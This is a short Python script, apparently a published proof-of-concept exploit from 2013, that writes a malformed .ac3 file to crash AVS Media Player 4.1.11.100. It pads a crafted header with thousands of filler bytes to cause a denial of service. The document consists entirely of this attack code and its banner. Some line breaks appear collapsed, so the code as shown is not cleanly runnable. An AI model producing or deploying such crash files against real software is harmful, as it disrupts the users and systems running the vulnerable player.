#!/usr/bin/python print """  [+]Exploit Title:AVS Media Player(.ac3)Denial of Service Exploit  [+]Vulnerable Product:4.1.11.100  [+]Download Product:http://www.avs4you.com/de/downloads.aspx  [+]All AVS4YOU Software has problems with format .ac3  [+]Date: 29.06.2013  [+]Exploit Author: metacom  [+]RST  [+]Tested on: Windows 7  """  buffer=( "\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9""\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E")   junk = "\x41" * 5000bob = "\x42" * 100  exploit = buffer+ junk + bob    try:     rst= open("exploit.ac3",'w')     rst.write(exploit)     rst.close()     print("\nExploit file created!\n") except:     print "Error"